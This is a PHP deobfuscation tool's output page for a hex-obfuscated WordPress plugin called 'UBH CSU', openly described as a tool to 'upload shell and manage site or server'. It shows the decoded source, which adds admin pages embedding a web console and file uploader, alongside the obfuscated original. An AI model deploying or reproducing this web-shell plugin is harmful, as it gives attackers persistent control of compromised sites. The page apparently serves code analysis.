Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* Plugin Name: UBH CSU Plugin URI: ubhteam.org Description: upload shell and ma..

Decoded Output download

<?php 
/* 
Plugin Name: UBH CSU 
Plugin URI: ubhteam.org 
Description: upload shell and manage site or server using console :D, happy hacking ;) ! 
Author: Prappo Prince 
Author URI: prappo-prince.me 
Version: 1.0 
*/ 
 
 
 
add_action("admin_menu", function() { 
    add_object_page("UBH", "UBH", "administrator", "ubh", function() { 
        echo "     <div align=\"center">
     <img src="http://www.ubhteam.org/images/UBHFinal1.png\"></img>
     <h1>United Bangladeshi Hackers</h1>
     <h2>www.ubhteam.org</h2>
     </div>
     "; 
      } 
 
    ); add_submenu_page("ubh", "UBH Console", "UBH Console", "administrator", "console", function() { 
        echo "        
        <IFRAME SRC=\""; echo plugins_url("con.php", __FILE__); echo "\" WIDTH=700 HEIGHT=400></IFRAME>
        "; 
      } 
 
    ); add_submenu_page("ubh", "File Uploader", "File Uploader", "administrator", "uploader", function() { 
        echo "        
        <IFRAME SRC=""; echo plugins_url("up.php", __FILE__); echo "\" WIDTH=1000 HEIGHT=450></IFRAME>
        
        "; 
      } 
 
    ); 
  } 
 
); 
?>

Did this file decode correctly?

Original Code

<?php
/*
Plugin Name: UBH CSU
Plugin URI: ubhteam.org
Description: upload shell and manage site or server using console :D, happy hacking ;) !
Author: Prappo Prince
Author URI: prappo-prince.me
Version: 1.0
*/



add_action("\x61d\x6d\x69\x6e_\x6d\x65nu", function() {
    add_object_page("UBH", "U\x42\x48", "\x61\x64mi\x6e\x69\x73tr\x61\x74or", "\x75\x62h", function() {
        echo " \x20\x20\x20\x20<d\x69v a\x6c\x69\x67n=\"cent\x65r\x22>\n\x20  \x20\x20\x3ci\x6d\x67 s\x72\x63\x3d\x22h\x74\x74p://ww\x77.u\x62hte\x61\x6d.\x6fr\x67/\x69ma\x67es/\x55\x42\x48Fi\x6eal\x31.png\">\x3c/\x69m\x67>\n    \x20<h1\x3e\x55\x6ei\x74e\x64 B\x61n\x67l\x61\x64e\x73hi \x48a\x63\x6be\x72\x73</\x68\x31\x3e\n \x20 \x20\x20\x3ch\x32\x3e\x77w\x77\x2e\x75b\x68\x74\x65a\x6d\x2eor\x67\x3c/h2\x3e\n     \x3c/\x64\x69\x76\x3e\n     ";
      }

    ); add_submenu_page("\x75bh", "\x55\x42H Cons\x6f\x6c\x65", "\x55BH \x43\x6fn\x73\x6fle", "adm\x69\x6eis\x74\x72at\x6f\x72", "\x63on\x73o\x6c\x65", function() {
        echo "  \x20\x20   \x20\n\x20\x20\x20     <I\x46RA\x4d\x45\x20\x53\x52\x43\x3d\""; echo plugins_url("c\x6fn.\x70\x68p", __FILE__); echo "\"\x20WI\x44TH=\x37\x300 HEIGHT\x3d4\x300\x3e</\x49\x46R\x41M\x45\x3e\n    \x20\x20 \x20";
      }

    ); add_submenu_page("u\x62\x68", "Fil\x65\x20U\x70\x6coad\x65\x72", "\x46i\x6c\x65 U\x70l\x6fader", "admin\x69strator", "u\x70l\x6fa\x64er", function() {
        echo "\x20  \x20  \x20 \n    \x20\x20\x20 <\x49\x46\x52\x41\x4d\x45\x20SRC=\x22"; echo plugins_url("\x75\x70\x2e\x70hp", __FILE__); echo "\" W\x49DT\x48\x3d1000 \x48EI\x47H\x54\x3d4\x35\x30\x3e\x3c/IFRA\x4d\x45>\n\x20\x20 \x20\x20  \x20\n    \x20  \x20";
      }

    );
  }

);
?>

Function Calls

None

Variables

None

Stats

MD5 1aea8b400eca4dd276c3f21df16e0a95
Eval Count 0
Decode Time 85 ms